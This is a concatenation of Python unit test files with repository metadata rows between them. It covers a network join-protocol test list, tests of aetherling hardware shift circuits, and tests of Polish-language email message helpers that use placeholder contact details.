'testJoinentVacuousImmutableRejectNewFuid',
'testJoinentVacuousImmutableRejectNewKeys',
'testJoinentVacuousImmutableRejectNewRole',
'testJoinentVacuousRejectedRejectNewKeys',
'testJoinentVacuousRejectedRejectNewRole',
'testJoinentVacuousRejectedRejectSameRoleKeys',
'testJoinentVacuousRejectedRejectSameAll',
'testJoinentVacuousEphemeralRejectedRejectSameall',
'testJoinentVacuousAcceptNewMain',
'testJoinentVacuousAcceptNewKind',
'testJoinentVacuousAcceptNewRha',
'testJoinentVacuousAcceptNewFuid',
'testJoinentVacuousAcceptNewKeys',
'testJoinentVacuousAcceptNewRole',
'testJoinentVacuousAcceptSameAll',
'testJoinentVacuousEphemeralAcceptSameall',
'testJoinentVacuousPendingPendNewMain',
'testJoinentVacuousPendingPendNewKind',
'testJoinentVacuousPendingPendNewRha',
'testJoinentVacuousPendingPendNewFuid',
'testJoinentVacuousPendingPendNewRole',
'testJoinentVacuousPendingPendSameAll',
'testJoinentVacuousEphemeralPendingPendSameAll',
'testJoinentNonVacuousImmutableRejectNewName',
'testJoinentNonVacuousImmutableRejectNewMain',
'testJoinentNonVacuousImmutableRejectNewKind',
'testJoinentNonVacuousImmutableRejectNewRha',
'testJoinentNonVacuousImmutableRejectNewFuid',
'testJoinentNonVacuousImmutableRejectNewKeys',
'testJoinentNonVacuousImmutableRejectNewRole',
'testJoinentNonVacuousRejectedRejectNewKeys',
'testJoinentNonVacuousRejectedRejectNewRole',
'testJoinentNonVacuousRejectedRejectSameAll',
'testJoinentNonVacuousRejectedRejectSameRoleKeys',
'testJoinentNonVacuousAcceptNewName',
'testJoinentNonVacuousAcceptNewMain',
'testJoinentNonVacuousAcceptNewKind',
'testJoinentNonVacuousAcceptNewRha',
'testJoinentNonVacuousAcceptNewFuid',
'testJoinentNonVacuousAcceptNewRole',
'testJoinentNonVacuousAcceptNewKeys',
'testJoinentNonVacuousAcceptSameAll',
'testJoinentNonVacuousPendingPendNewName',
'testJoinentNonVacuousPendingPendNewMain',
'testJoinentNonVacuousPendingPendNewKind',
'testJoinentNonVacuousPendingPendNewRha',
'testJoinentNonVacuousPendingPendNewFuid',
'testJoinentNonVacuousPendingPendNewRole',
'testJoinentNonVacuousPendingPendSameAll',
'testJoinerVacuousImmutableRejectNewName',
'testJoinerVacuousImmutableRejectNewMain',
'testJoinerVacuousImmutableRejectNewKind',
'testJoinerVacuousImmutableRejectNewKeys',
'testJoinerVacuousImmutableRejectNewRole',
'testJoinerVacuousRejectedRejectNewKeys',
'testJoinerVacuousRejectedRejectNewRole',
'testJoinerVacuousRejectedRejectSameAll',
'testJoinerVacuousRejectedRejectSameRoleKeys',
'testJoinerVacuousRejectedNorenewRejectSameAll',
'testJoinerVacuousAcceptNewName',
'testJoinerVacuousAcceptNewMain',
'testJoinerVacuousAcceptNewKind',
'testJoinerVacuousAcceptNewKeys',
'testJoinerVacuousAcceptNewRole',
'testJoinerVacuousAcceptSameAll',
'testJoinerVacuousNorenewAcceptSameAll',
'testJoinerVacuousPendingPendNewName',
'testJoinerVacuousPendingPendNewMain',
'testJoinerVacuousPendingPendNewKind',
'testJoinerVacuousPendingPendNewRole',
'testJoinerVacuousPendingPendSameAll',
'testJoinerVacuousPendingNorenewPendSameAll',
'testJoinerNonVacuousImmutableRejectNewName',
'testJoinerNonVacuousImmutableRejectNewMain',
'testJoinerNonVacuousImmutableRejectNewKind',
'testJoinerNonVacuousImmutableRejectNewRha',
'testJoinerNonVacuousImmutableRejectNewFuid',
'testJoinerNonVacuousImmutableRejectNewKeys',
'testJoinerNonVacuousImmutableRejectNewRole',
'testJoinerNonVacuousRejectedRejectNewKeys',
'testJoinerNonVacuousRejectedRejectNewRole',
'testJoinerNonVacuousRejectedRejectSameRoleKeys',
'testJoinerNonVacuousRejectedRejectSameAll',
'testJoinerNonVacuousAcceptNewName',
'testJoinerNonVacuousAcceptNewMain',
'testJoinerNonVacuousAcceptNewKind',
'testJoinerNonVacuousAcceptNewRha',
'testJoinerNonVacuousAcceptNewFuid',
'testJoinerNonVacuousAcceptNewRole',
'testJoinerNonVacuousAcceptNewKeys',
'testJoinerNonVacuousAcceptSameAll',
'testJoinerNonVacuousPendingPendNewName',
'testJoinerNonVacuousPendingPendNewMain',
'testJoinerNonVacuousPendingPendNewKind',
'testJoinerNonVacuousPendingPendNewRha',
'testJoinerNonVacuousPendingPendNewFuid',
'testJoinerNonVacuousPendingPendNewRole',
'testJoinerNonVacuousPendingPendSameAll',
'testJoinerVacuousImmutableRefuseRenew',
'testJoinentNonMainRejectJoin',
'testJoinentJoinRenameRemoteFail',
'testJoinentJoinRejectNameConflict',
'testJoinerAcceptRejectNameConflict',
'testJoinerAcceptRejectRenameFail',
'testJoinerAcceptErrorParseInner',
'testJoinerAcceptMissingName',
'testJoinerAcceptMissingMode',
'testJoinerAcceptMissingKind',
'testJoinerAcceptMissingUid',
'testJoinerAcceptMissingVerhex',
'testJoinerAcceptMissingPubhex',
'testJoinerAcceptMissingRole',
'testVacuousJoinerAcceptConflictNames',
'testVacuousJoinerAcceptRenameFail',
'testJoinerPendErrorParseInner',
'testJoinerNackErrorPack',
'testJoinerNackIncorrectPacketKind',
'testJoinerAckPendErrorPack',
'testJoinerAckAcceptErrorPack',
'testJoinerAckAcceptCascade',
'testJoinerRefuseErrorParseInner',
'testJoinerRejectErrorParseInner',
'testJoinerClearJoinentNotClear',
'testJoinerJoinInProcess',
'testJoinerJoinInvalidKind',
'testJoinerJoinPackError',
'testJoinerProcessNoPacketTimeout',
'testJoinentJoinErrorParseInner',
'testJoinentJoinMissingName',
'testJoinentJoinMissingVerhex',
'testJoinentJoinMissingPubhex',
'testJoinentJoinMissingRole',
'testJoinentJoinMissingMode',
'testJoinentJoinMissingKind',
'testJoinentJoinDuplicateJoinent',
'testVacuousJoinentJoinDuplicateNonVacuousJoiner',
'testNonVacuousJoinentJoinDuplicateVacuousJoiner',
'testJoinentJoinDuplicateJoinerMatchNames',
'testVacuousEphemeralJoinentJoinIncorrectRemoteId',
'testNonVacuousJoinentJoinNoDestinationIdMatch',
'testJoinentJoinErrorAddRemote',
'testJoinentReceiveRefuse',
'testJoinentAckPendErrorPack',
'testJoinentAckAcceptErrorPack',
'testJoinentAckAcceptIncorrectKind',
'testJoinentPendErrorParseInner',
'testJoinentCompleteErrorParseInner',
'testJoinentRejectErrorParseInner',
'testJoinentRefuseErrorParseInner',
'testJoinentNackErrorPack',
'testJoinentNackRenew',
'testJoinentNackUnknown',
'testFirstJoinRequestDropped',
'testAllJoinRequestsDropped',
'testFirstJoinAcceptDropped',
'testAllJoinAcceptDropped',
'testFirstJoinAckAcceptDropped',
'testAllJoinAckAcceptDropped',
'testFirstJoinRequestDelayed',
'testAllJoinRequestsDelayed',
'testFirstJoinAcceptDelayed',
'testAllJoinAcceptsDelayed',
'testJoinRequestDuplicated',
'testJoinAcceptDuplicated',
'testJoinAckAcceptDuplicated',
'testJoinerRestartNothingTransmitted',
'testJoinerRestartRequestTransmitted',
'testJoinerRestartAckAcceptTransmitted',
'testJoinentRestartBeforeAck',
'testJoinentRestartAckSent',
]
tests.extend(map(BasicTestCase, names))
suite = unittest.TestSuite(tests)
unittest.TextTestRunner(verbosity=2).run(suite)
def runAll():
'''
Unittest runner
'''
suite = unittest.TestSuite()
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(BasicTestCase))
unittest.TextTestRunner(verbosity=2).run(suite)
if __name__ == '__main__' and __package__ is None:
#console.reinit(verbosity=console.Wordage.concise)
#runAll() #run all unittests
runSome()#only run some
#runOne('testAllJoinAcceptDropped')
#runOne('testJoinerAcceptMissingMode')
| 42.892824
| 124
| 0.591889
| 60,485
| 603,116
| 5.867074
| 0.014764
| 0.086313
| 0.033629
| 0.02876
| 0.913563
| 0.905937
| 0.897109
| 0.884034
| 0.876656
| 0.86623
| 0
| 0.008175
| 0.299675
| 603,116
| 14,060
| 125
| 42.895875
| 0.831998
| 0.120813
| 0
| 0.893711
| 0
| 0
| 0.066108
| 0.033148
| 0
| 0
| 0
| 0
| 0.425487
| 1
| 0.021809
| false
| 0.00011
| 0.001872
| 0.00011
| 0.024672
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ff65b81221fbb9e35fdd85cf2a5b15c6d1ac9c3d
| 16,706
|
py
|
Python
|
tests/test_space_time/test_shift.py
|
David-Durst/aetherling
|
91bcf0579608ccbf7d42a7bddf90ccd4257d6571
|
[
"MIT"
] | 10
|
2018-04-03T01:51:16.000Z
|
2022-02-07T04:27:26.000Z
|
tests/test_space_time/test_shift.py
|
David-Durst/aetherling
|
91bcf0579608ccbf7d42a7bddf90ccd4257d6571
|
[
"MIT"
] | 19
|
2018-05-20T00:43:31.000Z
|
2021-03-18T20:36:52.000Z
|
tests/test_space_time/test_shift.py
|
David-Durst/aetherling
|
91bcf0579608ccbf7d42a7bddf90ccd4257d6571
|
[
"MIT"
] | 1
|
2018-07-11T23:36:43.000Z
|
2018-07-11T23:36:43.000Z
|
from aetherling.space_time import *
from magma import *
from magma.clock import *
from magma.bitutils import *
from magma.simulator.coreir_simulator import CoreIRSimulator
from magma.scope import Scope
import fault
from aetherling.space_time.type_helpers import flatten
from aetherling.helpers.fault_helpers import compile_and_run, set_nested_port, \
expect_nested_port, print_nested_port, int_to_ignore
import builtins
def test_shift_s():
num_in = 4
test_vals = [2,5,3,8]
shift_amount = 2
in_type = ST_SSeq(num_in, ST_Int())
scope = Scope()
args = ['I', In(in_type.magma_repr()), 'O', Out(in_type.magma_repr())] + ClockInterface(False, False)
testcircuit = DefineCircuit('Test', *args)
rshift = DefineShift_S(num_in, shift_amount, in_type.t)()
wire(rshift.I, testcircuit.I)
wire(testcircuit.O, rshift.O)
EndCircuit()
sim = CoreIRSimulator(testcircuit, testcircuit.CLK)
for i, val in enumerate(test_vals):
sim.set_value(testcircuit.I[i], int2seq(val, 8), scope)
sim.evaluate()
for i, val in enumerate(test_vals[shift_amount:]):
assert seq2int(sim.get_value(testcircuit.O[i + shift_amount])) == test_vals[i]
def test_fault_shift_s():
num_in = 4
test_vals = [2,5,3,8]
shift_amount = 2
in_type = ST_SSeq(num_in, ST_Int())
rshift = DefineShift_S(num_in, shift_amount, in_type.t, has_valid=True)
tester = fault.Tester(rshift, rshift.CLK)
tester.circuit.valid_up = 1
for i, val in enumerate(test_vals):
tester.circuit.I[i] = val
tester.eval()
for i, val in enumerate(test_vals[shift_amount:]):
tester.circuit.O[i + shift_amount].expect(test_vals[i])
tester.circuit.valid_down.expect(1)
compile_and_run(tester)
def test_shift_t_v_always_true_no_ce():
num_in = 4
test_vals = [2,5,3,8]
shift_amount = 1
in_type = ST_TSeq(num_in, 0, ST_Int())
num_clocks_per_iteration = len(test_vals)
num_iterations = 2
testcircuit = DefineShift_T(in_type.n, in_type.i, shift_amount, in_type.t, has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk in range(num_clocks_per_iteration):
tester.circuit.I = test_vals[clk] + i
tester.eval()
if clk >= shift_amount:
tester.circuit.O.expect(test_vals[clk - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_t_invalid_v_delayed_true_no_ce():
delay = 3
num_in = 5
test_vals = [2,5,3,8,10]
shift_amount = 1
in_type = ST_TSeq(num_in, 1, ST_Int())
num_clocks_per_iteration = num_in
num_iterations = 2
testcircuit = DefineShift_T(in_type.n, in_type.i, shift_amount, in_type.t, has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.valid_up = 0
for i in range(delay):
tester.step(2)
tester.circuit.valid_down.expect(0)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk in range(num_clocks_per_iteration):
val_idx = min(clk, len(test_vals) - 1)
tester.circuit.I = test_vals[val_idx] + i
tester.eval()
if clk >= shift_amount:
tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_t_invalid_v_delayed_true_ce():
delay = 3
num_in = 5
test_vals = [2,5,3,8,10]
shift_amount = 1
in_type = ST_TSeq(num_in, 1, ST_Int())
num_clocks_per_iteration = num_in + 1
num_iterations = 2
testcircuit = DefineShift_T(in_type.n, in_type.i, shift_amount, in_type.t, has_ce=True, has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.CE = 1
tester.circuit.valid_up = 0
for i in range(delay):
tester.step(2)
tester.circuit.valid_down.expect(0)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk in range(num_clocks_per_iteration):
tester.print("CLK: {}\n".format(clk))
val_idx = min(clk, len(test_vals) - 1)
tester.circuit.I = test_vals[val_idx] + i
tester.eval()
if clk >= shift_amount and clk < num_in:
tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_t_elem_invalid_invalid_v_delayed_true_ce():
delay = 3
num_in = 5
test_vals = [2,5,3,8,10]
shift_amount = 1
io = 1
ii = 2
in_type = ST_TSeq(num_in, io, ST_TSeq(1, ii, ST_Int()))
num_clocks_per_iteration = num_in + 1
num_iterations = 2
testcircuit = DefineShift_T(in_type.n, in_type.i, shift_amount, in_type.t, has_ce=True, has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.CE = 1
tester.circuit.valid_up = 0
for i in range(delay):
tester.step(2)
tester.circuit.valid_down.expect(0)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk_outer in range(num_clocks_per_iteration):
for clk_inner in range(1+ii):
tester.print("clk_outer: {}\n".format(clk_outer))
tester.print("clk_inner: {}\n".format(clk_inner))
val_idx = min(clk_outer, len(test_vals) - 1)
tester.circuit.I = test_vals[val_idx] + i + (0 if clk_inner == 0 else 32)
tester.eval()
if clk_outer >= shift_amount and clk_outer < num_in and clk_inner == 0:
tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_t_two_elem_and_invalid_invalid_v_delayed_true_ce():
delay = 3
num_in = 5
test_vals = [2,1,5,4,3,6,8,7,10,9]
shift_amount = 1
io = 1
ii = 1
in_type = ST_TSeq(num_in, io, ST_TSeq(2, ii, ST_Int()))
num_clocks_per_iteration = num_in + 1
num_iterations = 2
testcircuit = DefineShift_T(in_type.n, in_type.i, shift_amount, in_type.t, has_ce=True, has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.CE = 1
tester.circuit.valid_up = 0
for i in range(delay):
tester.step(2)
tester.circuit.valid_down.expect(0)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk_outer in range(num_clocks_per_iteration):
for clk_inner in range(2+ii):
tester.print("clk_outer: {}\n".format(clk_outer))
tester.print("clk_inner: {}\n".format(clk_inner))
val_idx = min(clk_outer * 2 + clk_inner, len(test_vals) - 1)
tester.circuit.I = test_vals[val_idx] + i + (0 if clk_inner < 2 else 32)
tester.eval()
if clk_outer >= shift_amount and clk_outer < num_in and clk_inner < 2:
tester.circuit.O.expect(test_vals[val_idx - shift_amount * 2] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_tt_v_always_true_no_ce():
num_in = [3,2]
test_vals = [2,5,7,3,8,9]
shift_amount = 1
in_type = ST_TSeq(num_in[0], 0, ST_TSeq(num_in[1], 0, ST_Int()))
num_clocks_per_iteration = len(test_vals)
num_iterations = 2
testcircuit = DefineShift_TT(in_type.n, in_type.t.n, in_type.i, in_type.t.i, shift_amount, in_type.t.t, has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk in range(num_clocks_per_iteration):
tester.print("CLK: {}\n".format(clk))
tester.circuit.I = test_vals[clk] + i
tester.eval()
if clk >= shift_amount:
tester.circuit.O.expect(test_vals[clk - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_tt_inner_invalid_v_always_true_no_ce():
num_in = [3,2]
test_vals = [2,5,7,3,8,9]
shift_amount = 1
ii = 2
in_type = ST_TSeq(num_in[0], 0, ST_TSeq(num_in[1], ii, ST_Int()))
num_iterations = 2
testcircuit = DefineShift_TT(in_type.n, in_type.t.n, in_type.i, in_type.t.i, shift_amount, in_type.t.t, has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk_outer in range(num_in[0]):
for clk_inner in range(num_in[1] + ii):
tester.print("clk_outer: {}\n".format(clk_outer))
tester.print("clk_inner: {}\n".format(clk_inner))
val_idx = clk_outer * 2 + min(clk_inner, num_in[1] - 1)
in_val = test_vals[val_idx] + i + (0 if clk_inner < 2 else 32)
tester.circuit.I = in_val
tester.print("I: {}\n".format(str(in_val)))
tester.eval()
tester.print("O: %d\n", tester.circuit.O)
#tester.print("inner_valid: %d\n", tester.circuit.inner_valid)
if val_idx >= shift_amount and clk_inner < 2:
tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_tt_inner_invalid_elem_invalid_v_always_true_no_ce():
num_in = [3,2]
test_vals = [2,5,7,3,8,9]
shift_amount = 1
ii = 2
iii = 2
in_type = ST_TSeq(num_in[0], 0, ST_TSeq(num_in[1], ii, ST_TSeq(1, iii, ST_Int())))
num_iterations = 2
testcircuit = DefineShift_TT(in_type.n, in_type.t.n, in_type.i, in_type.t.i, shift_amount, in_type.t.t, has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk_outer in range(num_in[0]):
for clk_inner in range(num_in[1] + ii):
for clk_innermost in range(0,3):
tester.print("clk_outer: {}\n".format(clk_outer))
tester.print("clk_inner: {}\n".format(clk_inner))
tester.print("clk_innermost: {}\n".format(clk_innermost))
val_idx = clk_outer * 2 + min(clk_inner, num_in[1] - 1)
in_val = test_vals[val_idx] + i + (0 if clk_inner < 2 and clk_innermost == 0 else 32)
tester.circuit.I = in_val
tester.print("I: {}\n".format(str(in_val)))
tester.eval()
tester.print("O: %d\n", tester.circuit.O)
#tester.print("inner_valid: %d\n", tester.circuit.inner_valid)
if val_idx >= shift_amount and clk_inner < 2 and clk_innermost == 0:
tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_tn_v_always_true_no_ce():
num_in = [3,2,2]
test_vals = [i*2 for i in range(num_in[0]*num_in[1]*num_in[2])]
shift_amount = 1
in_type = ST_TSeq(num_in[0], 0, ST_TSeq(num_in[1], 0, ST_TSeq(num_in[2], 0, ST_Int())))
num_clocks_per_iteration = len(test_vals)
num_iterations = 2
testcircuit = DefineShift_TN(in_type.n, (2,2), in_type.i, (0,0), shift_amount, ST_Int(), has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk in range(num_clocks_per_iteration):
tester.print("CLK: {}\n".format(clk))
tester.circuit.I = test_vals[clk] + i
tester.eval()
if clk >= shift_amount:
tester.circuit.O.expect(test_vals[clk - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_tn_inner_invalid_v_always_true_no_ce():
num_in = [3,2,2]
test_vals = [i*2 for i in range(num_in[0]*num_in[1]*num_in[2])]
shift_amount = 1
iis = (2,1)
in_type = ST_TSeq(num_in[0], 0, ST_TSeq(num_in[1], iis[0], ST_TSeq(num_in[2], iis[1], ST_Int())))
num_iterations = 2
testcircuit = DefineShift_TN(in_type.n, (2,2), in_type.i, iis, shift_amount, ST_Int(), has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk_outer in range(num_in[0]):
for clk_inner in range(num_in[1] + iis[0]):
for clk_ii in range(num_in[2] + iis[1]):
tester.print("clk_outer: {}\n".format(clk_outer))
tester.print("clk_inner: {}\n".format(clk_inner))
tester.print("clk_ii: {}\n".format(clk_ii))
val_idx = clk_outer * 4 + min(clk_inner, num_in[1] - 1) * 2 + min(clk_ii, num_in[2] - 1)
in_val = test_vals[val_idx] + i + (0 if clk_inner < 2 and clk_ii < 2 else 110)
tester.circuit.I = in_val
tester.print("I: {}\n".format(str(in_val)))
tester.eval()
tester.print("O: %d\n", tester.circuit.O)
#tester.print("inner_valid: %d\n", tester.circuit.inner_valid)
if val_idx >= shift_amount and clk_inner < 2 and clk_ii < 2:
tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_tn_inner_invalid_elem_invalid_v_always_true_no_ce():
num_in = [3,2,2]
test_vals = [i*2 for i in range(num_in[0]*num_in[1]*num_in[2])]
shift_amount = 1
iis = (2,1)
num_iterations = 2
testcircuit = DefineShift_TN(num_in[0], (2,2), 0, iis, shift_amount, ST_TSeq(1, 2, ST_Int()), has_valid=True)
tester = fault.Tester(testcircuit, testcircuit.CLK)
tester.circuit.valid_up = 1
for i in range(num_iterations):
for clk_outer in range(num_in[0]):
for clk_inner in range(num_in[1] + iis[0]):
for clk_ii in range(num_in[2] + iis[1]):
for clk_innermost in range(0, 3):
tester.print("clk_outer: {}\n".format(clk_outer))
tester.print("clk_inner: {}\n".format(clk_inner))
tester.print("clk_ii: {}\n".format(clk_ii))
val_idx = clk_outer * 4 + min(clk_inner, num_in[1] - 1) * 2 + min(clk_ii, num_in[2] - 1)
in_val = test_vals[val_idx] + i + (0 if clk_inner < 2 and clk_ii < 2 and clk_innermost == 0 else 110)
tester.circuit.I = in_val
tester.print("I: {}\n".format(str(in_val)))
tester.eval()
tester.print("O: %d\n", tester.circuit.O)
#tester.print("inner_valid: %d\n", tester.circuit.inner_valid)
if val_idx >= shift_amount and clk_inner < 2 and clk_ii < 2 and clk_innermost == 0:
tester.circuit.O.expect(test_vals[val_idx - shift_amount] + i)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
def test_shift_ts():
no = 2
io = 0
ni = 4
test_vals = [[0,1,2,3], [4,5,6,7]]
shifted_test_vals = [[int_to_ignore, int_to_ignore, 0, 1], [2, 3, 4, 5]]
shift_amount = 2
in_type = ST_TSeq(no, io, ST_SSeq(ni, ST_Int()))
rshift = DefineShift_TS(no, io, ni, shift_amount, in_type.t.t, has_valid=True)
tester = fault.Tester(rshift, rshift.CLK)
tester.circuit.valid_up = 1
for clk in range(len(test_vals)):
tester.print("clk: {}".format(clk))
set_nested_port(tester, tester.circuit.I, test_vals[clk], 1, 0)
print_nested_port(tester, tester.circuit.I, 1)
tester.print("\n")
tester.eval()
#for i, val in enumerate(test_vals[i*ni+shift_amount:(i+1)*ni+shift_amount]):
print_nested_port(tester, tester.circuit.O, 1)
tester.print("\n")
expect_nested_port(tester, tester.circuit.O, shifted_test_vals[clk], 1, 0)
tester.circuit.valid_down.expect(1)
tester.step(2)
compile_and_run(tester)
| 40.255422
| 125
| 0.613911
| 2,571
| 16,706
| 3.720342
| 0.047063
| 0.099216
| 0.063983
| 0.0207
| 0.88897
| 0.884684
| 0.858233
| 0.846837
| 0.843387
| 0.825196
| 0
| 0.027672
| 0.264516
| 16,706
| 414
| 126
| 40.352657
| 0.750794
| 0.019155
| 0
| 0.754986
| 0
| 0
| 0.019718
| 0
| 0
| 0
| 0
| 0
| 0.002849
| 1
| 0.039886
| false
| 0
| 0.02849
| 0
| 0.068376
| 0.091168
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
444a67f9fa72370d6eff0df38123a305ac00c1c5
| 4,611
|
py
|
Python
|
User/tests/test_view_email.py
|
LukaszHoszowski/Django_ProEstate
|
36c5cc25842f4e5afebd9ff6eaa83c9457fb7a3a
|
[
"MIT"
] | 1
|
2022-02-15T13:36:29.000Z
|
2022-02-15T13:36:29.000Z
|
User/tests/test_view_email.py
|
LukaszHoszowski/Django_ProEstate
|
36c5cc25842f4e5afebd9ff6eaa83c9457fb7a3a
|
[
"MIT"
] | null | null | null |
User/tests/test_view_email.py
|
LukaszHoszowski/Django_ProEstate
|
36c5cc25842f4e5afebd9ff6eaa83c9457fb7a3a
|
[
"MIT"
] | null | null | null |
import pytest
from User.user_helper_functions import create_email_subject_neighbour, create_email_subject_failure, \
create_email_message_neighbour, create_email_message_failure
def test_email_create_neighbour_subject():
first_name = 'John'
last_name = 'Smith'
username = 'John1908'
subject = create_email_subject_neighbour(first_name, last_name, username)
assert 'Prośba o kontakt od użytkownika John Smith (John1908)' == subject
def test_email_create_neighbour_subject_with_incorrect_data():
first_name = None
last_name = 'Smith'
username = 'John1908'
with pytest.raises(ValueError) as context:
create_email_subject_neighbour(first_name, last_name, username)
assert 'Wrong user data' in str(context.value)
def test_email_create_failure_subject():
building = 'Sesame Street 103'
failure_type = 'Zalanie'
subject = create_email_subject_failure(building, failure_type)
assert 'Zgłoszenie awarii - Sesame Street 103 - Zalanie' == subject
def test_email_create_failure_subject_with_incorrect_data():
building = None
failure_type = 'Zalanie'
with pytest.raises(ValueError) as context:
create_email_subject_failure(building, failure_type)
assert 'Wrong building data' in str(context.value)
def test_email_create_neighbour_message():
flat = 'Sesame Street 103/3'
phone = 89175852986
email = 'kermit@hotmail.com'
first_name = 'kermit'
last_name = 'defrog'
contact_flag = True
message = create_email_message_neighbour(flat, phone, email, first_name, last_name, contact_flag)
correct_message = """Witam,
Jestem Państwa sąsiadem z mieszkania Sesame Street 103/3.
Bardzo proszę o kontakt pod poniższym numerem telefonu lub przez pocztę elektroniczną:
Telefon: 89175852986
Email: kermit@hotmail.com
Z góry dziękuję i pozdrawiam,
Kermit Defrog
"""
assert correct_message == message
def test_email_create_neighbour_message_flag_false():
flat = 'Sesame Street 103/3'
phone = 89175852986
email = 'kermit@hotmail.com'
first_name = 'kermit'
last_name = 'defrog'
contact_flag = False
message = create_email_message_neighbour(flat, phone, email, first_name, last_name, contact_flag)
correct_message = """Witam,
Jestem Państwa sąsiadem z mieszkania Sesame Street 103/3.
Bardzo proszę o kontakt pod poniższym numerem telefonu lub przez pocztę elektroniczną:
Telefon: Użytkownik nie wyraził zgody na udostępnienie nr telefonu
Email: kermit@hotmail.com
Z góry dziękuję i pozdrawiam,
Kermit Defrog
"""
assert correct_message == message
def test_email_create_neighbour_message_with_incorrect_data():
flat = 'Sesame Street 103/3'
phone = 89175852986
email = None
first_name = 'kermit'
last_name = 'defrog'
contact_flag = True
correct_message = """Witam,
Jestem Państwa sąsiadem z mieszkania Sesame Street 103/3.
Bardzo proszę o kontakt pod poniższym numerem telefonu lub przez pocztę elektroniczną:
Telefon: 89175852986
Email: kermit@hotmail.com
Z góry dziękuję i pozdrawiam,
Kermit Defrog
"""
with pytest.raises(ValueError) as context:
create_email_message_neighbour(flat, phone, email, first_name, last_name, contact_flag)
assert 'Wrong user data' in str(context.value)
def test_email_create_failure_message():
failure_type = 'Zalanie'
flat = 'Sesame Street 103/3'
building = 'Sesame Street 103'
email = 'kermit@hotmail.com'
first_name = 'kermit'
last_name = 'defrog'
username = 'Kermit1999'
correct_message = """
użytkownik: kermit defrog / kermit@hotmail.com / Kermit1999
budynek: Sesame Street 103
mieszkanie: Sesame Street 103/3
typ awarii: Zalanie
"""
message = create_email_message_failure(first_name, last_name, email, username, flat, building, failure_type)
assert correct_message == message
def test_email_create_failure_message_with_incorrect_data():
failure_type = 'Zalanie'
flat = 'Sesame Street 103/3'
building = 'Sesame Street 103'
email = 'kermit@hotmail.com'
first_name = 'kermit'
last_name = 'defrog'
username = None
correct_message = """
użytkownik: kermit defrog / kermit@hotmail.com / Kermit1999
budynek: Sesame Street 103
mieszkanie: Sesame Street 103/3
typ awarii: Zalanie
"""
with pytest.raises(ValueError) as context:
create_email_message_failure(first_name, last_name, email, username, flat, building, failure_type)
assert 'Wrong user or building data' in str(context.value)
| 27.777108
| 112
| 0.73303
| 578
| 4,611
| 5.603806
| 0.1609
| 0.059278
| 0.074097
| 0.049398
| 0.846249
| 0.820932
| 0.765051
| 0.765051
| 0.715036
| 0.637234
| 0
| 0.036818
| 0.193017
| 4,611
| 165
| 113
| 27.945455
| 0.833647
| 0
| 0
| 0.723214
| 0
| 0
| 0.363262
| 0
| 0
| 0
| 0
| 0
| 0.080357
| 1
| 0.080357
| false
| 0
| 0.017857
| 0
| 0.098214
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
926f51a1ef4a0b61fb6eca53cf53cbe16d3b9e8d
| 20,408
|
py
|
Python
|
lib/charset.py
|
roidy/script.odroidn2.oled
|
60b91680da8d8918e7dea466cf5e91d9b80e9ca4
|
[
